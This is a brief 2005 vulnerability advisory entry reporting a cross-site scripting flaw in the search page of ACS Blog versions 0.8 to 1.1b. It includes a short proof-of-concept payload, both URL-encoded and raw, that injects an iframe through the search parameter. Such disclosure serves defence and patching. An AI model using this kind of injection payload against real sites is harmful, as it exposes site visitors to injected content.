XSS in ACS blog

2005-03-18T00:00:00
ID SECURITYVULNS:DOC:8094
Type securityvulns
Reporter Securityvulns
Modified 2005-03-18T00:00:00

Description

XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).

Vulnerable :

ACS Blog v 0.8 ACS Blog v 0.9 ACS Blog v 1.0 ACS Blog v 1.1b

Code :

/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

or goto /search.asp and copy this code : "<br><iframe src="http://google.com"></iframe>

Vendor URL : http://www.asppress.com